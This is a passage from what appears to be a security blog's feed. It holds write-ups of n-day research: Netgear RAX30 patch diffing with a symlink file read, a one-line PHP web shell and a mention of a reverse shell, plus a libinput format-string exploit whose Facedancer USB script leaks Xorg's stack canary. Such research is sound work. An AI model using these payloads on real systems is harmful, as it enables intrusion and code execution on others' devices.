<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">__isoc99_sscanf</span><span class="p">(</span><span class="n">local_3024</span><span class="p">,</span><span class="s">"%[^ ] %[^ ] %[^ ]"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">iVar7</span> <span class="o">=</span> <span class="n">strcasecmp</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span> <span class="s">"post"</span><span class="p">);</span>
</code></pre></div></div>

<p>This is the patched version of the same code, showing the addition of length limit specs in the format string:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">__isoc99_sscanf</span><span class="p">(</span><span class="o">&amp;</span><span class="n">local_1824</span><span class="p">,</span><span class="s">"%511[^ ] %511[^ ] %511[^ ]"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v3</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">iVar7</span> <span class="o">=</span> <span class="n">strcasecmp</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">v1</span><span class="p">,</span><span class="s">"post"</span><span class="p">);</span>
</code></pre></div></div>

<p>On the surface this looks like a pretty straightforward stack-based buffer overflow, and there seem to be some variables within the function that may be interesting targets for overwrite. An interesting note is that the advisory does not indicate this bug results in code execution but instead specifically mentions that it can be used to bypass authentication. This may be due to the fact that the binary is built with stack canaries, which makes exploitation more difficult. This is the same reason why I’d been unable to exploit the variant of this bug I mentioned earlier.</p>

<p><strong>NOTE</strong>: The folks who discovered and exploited this bug at Pwn2Own posted their write-up of this bug before I had finished this post so I’ve been able to confirm the above assumption was correct: the stack canaries resulted in the bug not being directly exploitable for code exec. Check out their write-up <a href="https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022">here</a> to see how they chained this bug with a few others to get RCE.</p>

<h3 id="zdi-23-496-lighttpd-misconfiguration-rce">ZDI-23-496: lighttpd Misconfiguration RCE</h3>

<p>The information provided about this bug indicates it isn’t a memory corruption issue but a misconfiguration that results in arbitrary code execution. Specifically it says:</p>

<blockquote>
  <p>The specific flaw exists within the configuration of the lighttpd HTTP server. The issue results from allowing execution of files from untrusted sources. An attacker can leverage this vulnerability to execute code in the context of root.</p>
</blockquote>

<p>Based on this description, I focused on comparing the lighttpd configuration files in <code class="language-plaintext highlighter-rouge">etc/lighttpd</code> between the two versions.</p>

<h4 id="comparing-config-changes">Comparing Config Changes</h4>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/lighttpd4.conf</code></strong></p>

<p>The patches version of this file includes the follow additions:</p>

<ul>
  <li>Addition of <code class="language-plaintext highlighter-rouge">alias.url = ("/shares" =&gt; "/var/samba/share/"</code> at the global level</li>
  <li>Inside the <code class="language-plaintext highlighter-rouge">HTTP["url"] = "^/shares"</code> definition for “usb storage” in the IPv4 section
    <ul>
      <li><code class="language-plaintext highlighter-rouge">server.follow-symlink = "disable"</code></li>
      <li><code class="language-plaintext highlighter-rouge">static-file.exclude-extensions = ()</code></li>
      <li><code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code></li>
    </ul>
  </li>
</ul>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/usb_lighttpd.conf</code></strong></p>

<ul>
  <li>Addition of <code class="language-plaintext highlighter-rouge">alias.url = ("/shares" =&gt; "/var/samba/share/"</code> at the global level</li>
</ul>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/usb_allow.inc</code></strong></p>

<ul>
  <li>Inside the <code class="language-plaintext highlighter-rouge">HTTP["url"] = "^/shares"</code> definition for “usb storage” in the IPv4 section
    <ul>
      <li><code class="language-plaintext highlighter-rouge">server.follow-symlink = "disable"</code></li>
      <li><code class="language-plaintext highlighter-rouge">static-file.exclude-extensions = ()</code></li>
      <li><code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code></li>
    </ul>
  </li>
</ul>

<p><strong><code class="language-plaintext highlighter-rouge">etc/lighttpd/conf.d/usb_allow_auth.inc</code></strong></p>

<ul>
  <li>Inside the <code class="language-plaintext highlighter-rouge">HTTP["url"] = "^/shares"</code> definition for “usb storage” in the IPv4 section
    <ul>
      <li><code class="language-plaintext highlighter-rouge">server.follow-symlink = "disable"</code></li>
      <li><code class="language-plaintext highlighter-rouge">static-file.exclude-extensions = ()</code></li>
      <li><code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code></li>
    </ul>
  </li>
</ul>

<h4 id="conclusions-based-on-changes">Conclusions Based on Changes</h4>

<p>The issue seems to be focused around the <code class="language-plaintext highlighter-rouge">/shares</code> path, which is mapped to the samba share directory where mounted USB drives can be accessed on the network like a NAS. The addition of <code class="language-plaintext highlighter-rouge">server.follow-symlink = "disabled"</code> suggests the issue may result in the ability to access files on the host filesystem using symlinks on the mounted drive.</p>

<p>Its possible that the addition of <code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code> was needed to avoid having the global settings for this handlers apply. The top level fastcgi.server assignment in <code class="language-plaintext highlighter-rouge">conf.d/lighttpd4.conf</code> shows the following:</p>

<div class="language-nginx highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fastcgi.server</span> <span class="s">+=</span> <span class="s">(</span>
	<span class="s">".php"</span> <span class="p">=</span><span class="s">&gt;</span> <span class="s">((</span>
		<span class="s">"socket"</span> <span class="p">=</span><span class="s">&gt;</span> <span class="s">"/var/run/php-fpm.sock",</span>
		<span class="c1">#"bin-path" =&gt; "/bin/php-fpm -n -R -y /etc/php-fpm.conf",</span>
		<span class="c1">#"max-procs" =&gt; 1,</span>
		<span class="s">"broken-scriptfilename"</span> <span class="p">=</span><span class="s">&gt;</span> <span class="s">"enable"</span>
	<span class="s">))</span>
<span class="s">)</span>
</code></pre></div></div>

<p>This lead me to believe the exclusion of the explicit <code class="language-plaintext highlighter-rouge">fastcgi.server = ()</code> in the pre-patched version resulted in the global setting being applied, which would allow PHP files to be executed.</p>

<h2 id="exploits-zdi-23-496-lighttpd-misconfiguration">Exploits: ZDI-23-496 Lighttpd Misconfiguration</h2>

<p>Based on the conclusions drawn from the changes made, the most likely entry point was going to be files mounted via USB drive so I created a ext2-formatted drive to use for testing (ext2 since it was going to be necessary to create symlinks) and downgraded to the vulnerable firmware version.</p>

<h3 id="local-file-inclusion-via-symlink">Local File Inclusion via Symlink</h3>

<p>My assumption was that the addition of the symlink config options in the latest patches meant that the vulnerable version would follow symlinks resulting in the ability to reference (and access) files outside of the USB filesystem. To test this, I created a symlink on the USB drive pointing to <code class="language-plaintext highlighter-rouge">/var/passwd</code> as this is where the actual passwd file is stored on the device at runtime. If the assumption is correct, accessing this file from the router should return the actual password file from the device.</p>

<p>After connecting the USB drive to the router, the files become visible at <code class="language-plaintext highlighter-rouge">http://&lt;routerip&gt;/shares/</code>. Accessing the symlink that was created pointing to <code class="language-plaintext highlighter-rouge">/var/passwd</code> results in the actual password file on the device (found at that path) being returned and downloaded locally.</p>

<p><img src="/assets/images/pocrax-passwd.png" alt="pocrax-passwd.png" /></p>

<h3 id="rce-via-php-files">RCE via PHP Files</h3>

<p>To test the assumption regarding PHP files mounted via USB being executable, I used the same USB stick, this time simply creating a PHP file to execute <code class="language-plaintext highlighter-rouge">phpinfo();</code> as a simple way to confirm execution. This worked as expected and the PHP info output was shown on the page. I then created a simple PHP page that would allow me to pass shell commands in a URL parameter for easy shell access.</p>

<p>PHP shell command proxy:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> <span class="k">echo</span> <span class="nb">system</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span> <span class="cp">?&gt;</span>
</code></pre></div></div>

<p>Finally, I used this to have the device download a shell script over HTTP from my machine to open a reverse shell:</p>

<p><img src="/assets/images/poc-rax30-shell.png" alt="poc-rax30-shell.png" /></p>

<h2 id="conclusion">Conclusion</h2>

<p>This turned out to be a fun exercise and it turned out some of my prior experience with Netgear devices proved to be useful.</p>

<p>The <code class="language-plaintext highlighter-rouge">soap_serverd</code> issue was exploited during the latest Pwn2Own as part of a longer exploit chain that eventually resulted in RCE, though direct exploitation seems infeasible due to the presence of stack canaries.</p>

<p>For the <code class="language-plaintext highlighter-rouge">lighttpd</code> issue, exploitation requires physical access to the device, at least long enough to plug in the USB drive and send the necessary requests. This isn’t infeasible, though considering these routers are primarily used in SOHO settings this may not be quite as critical as a fully remote RCE.</p>

<h1 id="referenceslinks">References/Links</h1>

<ul>
  <li><a href="https://www.netgear.com/support/product/rax30#download">Netgear RAX30 firmware</a></li>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-499/">ZDI-23-499 - soap_serverd buffer overflow</a></li>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-496/">ZDI-23-496 - Lighttpd misconfiguration</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="nday" /><category term="ndays" /><category term="patchdiff" /><category term="rax30" /><category term="exploit" /><category term="zdi-23-499" /><summary type="html"><![CDATA[patch diff analysis of the latest patches for the netgear rax30 and an nday exploit for one of them (ZDI-23-496)]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/poc-rax30-shell.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/poc-rax30-shell.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)</title><link href="https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html" rel="alternate" type="text/html" title="nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)" /><published>2022-08-04T00:00:00+00:00</published><updated>2022-08-04T00:00:00+00:00</updated><id>https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak</id><content type="html" xml:base="https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html"><![CDATA[<p>At the end of last year I stumbled on a crash in Xorg while playing with the <a href="https://greatscottgadgets.com/greatfet/one/">GreatFET One</a> but never really got around to follow up on it. Then a few weeks ago, I decided to finally root cause the issue and while in the middle of doing so I discovered that the issue had been reported and fixed only 3 months ago. Since I’d already started working on it though, I decided to just move onto writing some exploits. In this post I walk through the details of writing an exploit to leak the stack canary.</p>

<h2 id="discovery">Discovery</h2>

<p>This is an issue that I had independently discovered in Xorg (or so I thought) a while back while messing around with the <a href="https://greatscottgadgets.com/greatfet/one/">GreatFET One</a>, a cool little device for USB hacking. While trying out some random payloads I found that connecting a USB keyboard device with format strings in certain device descriptor fields caused Xorg to crash. Specifically, it was the manufacturer, serial, product string fields. Unfortunately, I quickly ran into issues while trying to setup a testing environment as I would immediately crash my own X session as soon as I connected the device, even when trying to pass it through to a VM directly. I decided to just save it for another day when I had time to figure out a good solution to those issues, but it ended up sitting for months and I never did much to go back to it.</p>

<p>Then,  a couple of weeks ago I saw some CVEs get released for something in Xorg that seemed tangentially related to input devices, which piqued my attention. It got me wondering whether it was the same bug I had found, so I dug up my notes and decided to take a closer look. While doing this I figured out that the issue was actually not in Xorg itself (at least not completely), but actually in <code class="language-plaintext highlighter-rouge">libinput</code>. Once I’d figured this out, I went looking for the libinput source code to find the code for the functions I was seeing in the backtrace and ended up finding the <a href="https://gitlab.freedesktop.org/libinput/libinput/-/issues/752">specific commit</a> where the issue was fixed in April of this year.  Well, shit lmao.</p>

<h2 id="root-cause-analysis">Root Cause Analysis</h2>

<p>The reporter of the issue provided a detailed description of the vulnerability in the report. Here’s a snippet that’s a good tl;dr:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>- Newly connected evdev devices are logged using evdev_log_msg.
- The format parameter is manipulated at src/evdev.h:785 to prepend (among other things) the device name.
- The resulting string buf is then passed as the format parameter to log_msg_va at src/evdev.h:796
- In X.org (and probably other users of libinput), this logging function eventually leads into the system's sprintf.
- If the device name contains printf-style formatting placeholders such as %s or %d, these will be passed on to the new format string, and interpreted incorrectly. User-controlled format strings are a known security vulnerability, CWE-134, and can be used by an attacker to execute malicious code.
</code></pre></div></div>

<p>Basically, the issue came down to the fact that user-controlled input was prepended to a predefined format string before being used as the format argument in a call to <code class="language-plaintext highlighter-rouge">sprintf()</code>.</p>

<p>While doing some more digging on specific components of libinput I came across the <a href="https://www.assured.se/posts/accidental-intrusion">blog post</a> where the reporter(s) talked about the accidentally stumbling across the issue and their root causing process (no surprise, its actually a security company lol). Check out that post for a great analysis and description of exactly where the issue happens.</p>

<p>So, the root cause analysis was already done…but no poc exploit code was provided. There was an intersting discussion around the likelihood/plausability of exploitation in the git issue between the reporter(s) and developers where they discussed potential avenues for exploitation and the true impact/risk (check it out for details). tl;dr the determination was that at best the bug provides an attacker with an info leak and nothing else but at worst could <em>potentially</em> lead to code execution.</p>

<p>With that in mind, I thought it still might be worth doing the work of exploring both the info leak and the potential for RCE and produce exploits for both (hopefully).</p>

<h2 id="exploit-leaking-the-stack-canary">Exploit: Leaking the Stack Canary</h2>

<p>I started off with the info leak exploit. One of the most useful things an info leak can provide is the ability to leak the stack canary so I decided that would be the goal of the exploit. Because the canary value is stored on the stack and format string arguments are read from the stack, its usually possible to do this pretty easily.</p>

<p>Testing environment:</p>
<ul>
  <li>Debian 11 host</li>
  <li>Xubuntu 20.04 VM in Virtualbox</li>
  <li>USB host device passthrough to the VM</li>
  <li>Set up SSH on VM</li>
</ul>

<p>First things first, though: in order for a format string to be useful for this kind of info leak, there needs to be a way to get output back from the program that shows the values read from the stack. Thankfully, in this case,the output is written to the Xorg log file, which is world-readable. With the confirmed, the next step was figuring out exactly where the stack canary was so we can find it reliably.</p>

<h3 id="constraints-field-length-limit">Constraints: Field Length Limit</h3>

<p>In this case, there were some constraints that made things only slightly harder. The length of each field must be less than 126 characters - this is because the USB device structure that holds the fields is 255 bytes, the first 4 of which are reserved to hold the length of the field. The string values are interpreted as UTF-16 as per the USB specification, so the remaining 254 bytes are split in half.</p>

<h3 id="constraint-additional-s-format-strings">Constraint: Additional %s format strings</h3>

<p>The first issue I ran into almost right away when I started testing payloads was that nearly every payload I tried immediately resulted in a SIGSEGV. It wasn’t immediately obvious why this was happening as it’s usually possible to use specifiers like <code class="language-plaintext highlighter-rouge">%x</code> to read values without causing a crash (i.e. doesn’t usually lead to OOB read).</p>

<p>Specifically, one of the calls to <code class="language-plaintext highlighter-rouge">*sprintf_internal</code> was prepending the format strings I was submitting to another string that contained another 11 <code class="language-plaintext highlighter-rouge">%s</code> specifiers, as show in the GDB output below</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 1 <span class="s2">"Xorg"</span> hit Breakpoint 1, __vsnprintf_internal <span class="o">(</span><span class="nv">string</span><span class="o">=</span>0x7ffce6903d65 <span class="s2">""</span>, <span class="nv">maxlen</span><span class="o">=</span>0x3fb, <span class="nv">format</span><span class="o">=</span>0x7ffce69041c0 <span class="s2">"event7  - CCCC &lt;CONTROLLED INPUT&gt;: is tagged by udev as:%s%s%s%s%s%s%s%s%s%s%s</span><span class="se">\n</span><span class="s2">"</span>, <span class="nv">args</span><span class="o">=</span>0x7ffce69041a8, <span class="nv">mode_flags</span><span class="o">=</span>0x2<span class="o">)</span> at vsnprintf.c:95
</code></pre></div></div>

<p>This is a problem because each format specifier placed in the controllable strings will consume an argument from the stack and <code class="language-plaintext highlighter-rouge">%s</code> format specifiers indicate the argument value will be treated as a char pointer and dereferenced as such; once the arguments for each format spec in the submitted payload were consumed, it became virtually impossible to avoid triggering a segmentation fault caused by a read to an invalid address when the <code class="language-plaintext highlighter-rouge">%s</code> specs were reached.</p>

<p>After doing a bit of reading through the man pages for sprintf and some Google searches, I figured out I could use direct parameter access on the format specs in my payload to keep the <code class="language-plaintext highlighter-rouge">va_arg</code> pointer fixed. Using parameter access in the format specs does not move the main argument pointer, so in a format string such as <code class="language-plaintext highlighter-rouge">%1$x %2$x %x</code> , the first format reads from parameter 1 and the second from parameter 2, but the third reads from <em>parameter 1</em> again because it’s the first format spec to appear without a parameter specified. The example below shows this in action:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xorg@xuxorg:~<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"%1</span><span class="se">\$</span><span class="s2">s%2</span><span class="se">\$</span><span class="s2">s%3</span><span class="se">\$</span><span class="s2">s%4</span><span class="se">\$</span><span class="s2">s"</span> | ./toy
<span class="o">[</span>+] <span class="nb">fmt </span>string: <span class="s1">'%1$s%2$s%3$s%4$s | %s%s%s%s\n'</span>
<span class="o">[</span>+] args: <span class="s1">'1111.'</span>, <span class="s1">'4444.'</span>, <span class="s1">'5555.'</span>, <span class="s1">'6666.'</span>

<span class="o">[</span>+] result:
1111.4444.5555.6666. | 1111.4444.5555.6666.
</code></pre></div></div>

<p>This is how I was able to get around the issues with the extra <code class="language-plaintext highlighter-rouge">%s</code> specs, but it cut down the total number of format specificiers I could place in a single field. There were a total of 126 characters that could be used and each normal format spec (without a parameter index) takes up 2 characters, resulting in a total of 63 format specs that could be inserted. The addition of the parameter access syntax adds a minimum of 2 characters per format spec. Assuming only single-digit indices are used (4 characters total), this cuts down the actual max number of specs that could be included in each field to 31. This means for each run of the ‘exploit’ we’ll only be able to read a total of 31 values off of the stack.</p>

<p>Those already familiar with format string bugs would be correct to assume that, ultimately, this length limit isn’t necessarily an issues since it doesn’t limit how <em>far</em> into the stack we’re able to read. This is because the set of parameter indices can be updated between runs (e.g. run1 uses indices 1-20, run2 uses indices 20-40, etc) to continue reading further into memory. Unfortunately, this is one of the cases where the length limit is very <em>much</em> an issue, as I quickly discovered when I tried to do that.</p>

<h3 id="constraints-fortify_source2">Constraints: FORTIFY_SOURCE=2</h3>

<p><img src="/assets/images/checksec.png" alt="checksec" /></p>

<p>While doing some testing and trying to dump out values I noticed that any time I used parameter access format specs that didn’t include all indices below the max index used (i.e. if a format string accessed parameter 5 without accessing 1-4) the application would crash with a SIG_ABORT. When investigating this with GDB attached, I noticed this string in the exception handler that throws the ABORT signal: <code class="language-plaintext highlighter-rouge">"*** invalid %N$ use detected ***\n"</code>. A quick Google search later led me to figuring out that the Xorg binary I was testing against was compiled with the FORTIFY_SOURCE=2 flag.</p>

<h3 id="a-quick-detour-tldr-on-fortify_source2">a quick detour: tl;dr on FORTIFY_SOURCE=2</h3>

<p>I wasn’t familiar with the specific mitigations/checks provided by this flag before this so I spent a bit of time digging into it. I’ll probably spend more time talking about this in a future post so for now here’s the tl;dr version with the most important points:</p>

<ul>
  <li>Compiler-provided security checks and exploit mitigation mechanisms (just like <code class="language-plaintext highlighter-rouge">-fstack-protector</code>)</li>
  <li>This includes both compile-time and run-time checks</li>
  <li><code class="language-plaintext highlighter-rouge">=2</code> specifically enables format string exploit mitigations; requires optimization level ≥ 2
    <ul>
      <li><code class="language-plaintext highlighter-rouge">%n</code> is not allowed in format strings stored in writeable memory (i.e. don’t allow from user-writeable memory regions)</li>
      <li>Direct parameter access cannot ‘skip’ values; if the 5th parameter is accessed directly, parameters 1-4 must also be accessed somewhere in the format string</li>
    </ul>
  </li>
</ul>

<p>That last point is the pertinent one in regard to the issue mentioned at the end of the previous section. This meant that the length limit would effectively create a maximum parameter index that could be accessed while remaining within the boundaries of the constraints and avoiding a crash.</p>

<p>We can calculate the max index like so:</p>

<ul>
  <li>Accessing single-digit indices consume 4 characters per spec: <code class="language-plaintext highlighter-rouge">%N$x</code>
    <ul>
      <li>Accessing arguments 1-9 consumes 36 characters total  (<code class="language-plaintext highlighter-rouge">9 * 4</code>)</li>
    </ul>
  </li>
  <li>Accessing double digit indices (10 to 99)  consume 5 characters per spec: <code class="language-plaintext highlighter-rouge">%NN$x</code>
    <ul>
      <li>With 90 characters remaining (<code class="language-plaintext highlighter-rouge">126 - 36</code>), a maximum of 18 more arguments can be accessed (<code class="language-plaintext highlighter-rouge">90 / 5</code>)</li>
    </ul>
  </li>
  <li>Maximum index is 9 + 18 = 27</li>
</ul>

<h3 id="exploit-leaking-the-canary">Exploit: Leaking the Canary</h3>

<p>Given the constraints described above, the exploit ultimately comes down to a bit of luck —  as long as the canary is close enough on the stack to be reachable with the available parameter indices for the vulnerable stack frame, it should be leaked in the log file.</p>

<p>I began with this payload, which only reads up to the 22nd arg so that the <code class="language-plaintext highlighter-rouge">.</code>’s between the specs can be included to split things up and make the outputs easy to distinguish.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sh">"</span><span class="s">%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p.%8$p.%9$p.%10$p.%11$p.%12$p.%13$p.%14$p.%15$p.%16$p.%17$p.%18$p.%19$p.%20$p.%21$p.%22$p</span><span class="sh">"</span>
</code></pre></div></div>

<p>Unfortunately, that didn’t work and none of the values in the output matched the pattern of a canary. So, it would come down to the last 5 args. I removed the dots from the first 22 formats to get those characters back and read up the 25th.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sh">"</span><span class="s">%1$p%2$p%3$p%4$p%5$p%6$p%7$p%8$p%9$p%10$p%11$p%12$p%13$p%14$p%15$p%16$p%17$p%18$p%19$p%20$p%21$p%22$p.%23$p.%24$p.%25$p</span><span class="sh">"</span>
</code></pre></div></div>

<p>Luck was on my side. I checked the logs and found what looked a lot like a canary value. As can be seen, the value’s location on the stack changes slightly between different vulnerable function calls. Stack canaries on most Linux distros are 64-bit numbers that end with a null byte. They’re usually not too difficult to find since they don’t look like valid addresses or hex ASCII values(except when they do).</p>

<p><img src="/assets/images/xorg-log-canary.png" alt="xorg log with canary values" /></p>

<h4 id="facedancer-script">Facedancer Script</h4>

<p>Facedancer is the name of another USB hacking board similar to the GreatFET and a Python module that provides USB emulation capabilities for compatible boards. This is incredibly useful for quick prototyping and testing, especially being able to programmatically define how the device will behave in response to different requests sent by the host.</p>

<p>This Facedancer script will trigger the bug and place markers around the locations that are likely to contain the canary value to make it easier to find.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
# pylint: disable=unused-wildcard-import, wildcard-import
</span><span class="kn">import</span> <span class="n">sys</span>
<span class="kn">import</span> <span class="n">os</span>
<span class="kn">import</span> <span class="n">logging</span>
<span class="kn">from</span> <span class="n">facedancer</span>             <span class="kn">import</span> <span class="n">devices</span><span class="p">,</span> <span class="n">main</span>
<span class="kn">from</span> <span class="n">facedancer.devices.keyboard</span> <span class="kn">import</span> <span class="n">USBKeyboardDevice</span>

<span class="n">prefix</span> <span class="o">=</span> <span class="sh">"</span><span class="s">%1$c%2$c%3$c%4$c%5$c%6$c%7$c%8$c%9$c%10$c%11$c%12$c%13$c%14$c%15$c%16$c%17$c%18$c%19$c%20$c%21$c%22$c</span><span class="sh">"</span>
<span class="n">canary_maybes</span> <span class="o">=</span> <span class="sh">"</span><span class="s">X:%23$p_X:%24$p_X:%25$p</span><span class="sh">"</span> <span class="c1"># grep for `X:0x.{14}00`
</span><span class="n">payload</span> <span class="o">=</span> <span class="n">prefix</span> <span class="o">+</span> <span class="n">canary_maybes</span>

<span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">[+] reading args from $FSERIAL, $FPRODUCT, and $FMANU env vars</span><span class="sh">"</span><span class="p">)</span>
<span class="n">serial</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">FSERIAL</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">C</span><span class="sh">"</span><span class="o">*</span><span class="mi">100</span><span class="p">)</span>
<span class="n">product</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">FPRODUCT</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">HYPRODUCT</span><span class="sh">"</span><span class="p">)</span>
<span class="n">manu</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">FMANU</span><span class="sh">"</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

<span class="c1"># create the device and connect
</span><span class="n">DEVICE</span> <span class="o">=</span> <span class="nc">USBKeyboardDevice</span><span class="p">()</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">serial_number_string</span> <span class="o">=</span> <span class="n">serial</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">manufacturer_string</span> <span class="o">=</span> <span class="n">manu</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">product_string</span> <span class="o">=</span> <span class="n">product</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">product_id</span> <span class="o">=</span> <span class="mh">0x1337</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">vendor_id</span> <span class="o">=</span> <span class="mh">0x1337</span>
<span class="nf">main</span><span class="p">(</span><span class="n">DEVICE</span><span class="p">)</span>
</code></pre></div></div>

<p>The values can then be searched for in the Xorg log file using grep:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># find it in the logs</span>
<span class="nb">grep</span> <span class="nt">-a</span> <span class="nt">-E</span> <span class="s2">"X:0x.{14}00"</span> /var/log/Xorg.0.log
</code></pre></div></div>

<p>The screenshot below the canary value in the running Xorg process while attached with GDB and the same value shown in the Xorg log:</p>

<p><img src="/assets/images/gdb-canary-confirm.png" alt="gdb confirm" /></p>

<p>This has only been confirmed to work on default installations of Xubuntu 20.04.4 (i.e. before installing any updates, as patches have been pushed). I did test on a Debian 11 system but wasn’t able to get the canary value to leak within the same constraints. Apparently, most distros now enable essentially all exploit mitigations (canaries, RELRO, FORTIFY_SOURCE, etc) on default packages. So, YMMV on different distros or even Ubuntu versions.</p>

<h2 id="code-exec">Code Exec?</h2>

<p>I spent quite a bit of time trying to see whether I could turn this into a code execution bug, but as mentioned above, the FORTIFY_SOURCE=2 checks prevent the use of <code class="language-plaintext highlighter-rouge">%n</code> , which really complicates things. The only bypass technique I’ve been able to find is from a 2010 Phrack article, “A Eulogy for Format Strings”, which involves abusing the use of <code class="language-plaintext highlighter-rouge">alloca</code> in glibc’s internal vfprintf implementation to shift the stack and cause a 4-byte NULL write at a controllable location. This NULL write is used to overwrite the flag on the open file stream object for stdout which is used to determine whether to enforce the FORTIFY checks. I’m not sure whether that same behavior can be abused in modern glibc versions on 64-bit systems (pretty much everything I’ve found online is on 32-bit systems, and at least 6-7 years old) but I’m still playing around with it. I’ve been able to get some interesting behavior but nothing so far that’s gotten me closer to code exec in any significant way. In any case, I think it may be an area worth exploring, if at least to confirm whether some bypass can be achieved on modern systems. If not, I may end up just building a vulnerable version without the fortify checks and write an exploit for that.</p>

<p>So, for now, no code exec :(.</p>

<h2 id="referenceresources">Reference/Resources</h2>
<ul>
  <li><a href="https://gitlab.freedesktop.org/libinput/libinput/-/issues/752">libinput Gitlab Issue #752</a></li>
  <li><a href="https://www.assured.se/posts/accidental-intrusion">Accidental Intrusion, CVE-2022-1215</a> (blog post by the researcher(s) that reported the bug)</li>
  <li><a href="http://phrack.org/issues/67/9.html">A Eulogy for Format Strings (Phrack 0x43)</a></li>
  <li><a href="https://github.com/greatscottgadgets/Facedancer">Facedancer</a></li>
  <li><a href="https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/">Stack Canaries</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="nday" /><category term="cve-2022-1215" /><category term="libinput" /><category term="info-leak" /><category term="exploit" /><category term="nday" /><summary type="html"><![CDATA[a quick post on a format string bug in libinput I found last year but never got around to debugging, plus some exploit code to leak the stack canary on a default Xubuntu 20.04.4 system.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/xorg-log-canary.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/xorg-log-canary.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)</title><link href="https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861.html" rel="alternate" type="text/html" title="nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)" /><published>2022-07-02T00:00:00+00:00</published><updated>2022-07-02T00:00:00+00:00</updated><id>https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861</id><content type="html" xml:base="https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861.html"><![CDATA[<p>An unauthenticated command injection vulnerability in Netgear Orbi devices was reported to Netgear in December 2020 by ZDI. I wanted to learn more about the bug, but the details of the vulnerability were never released and there 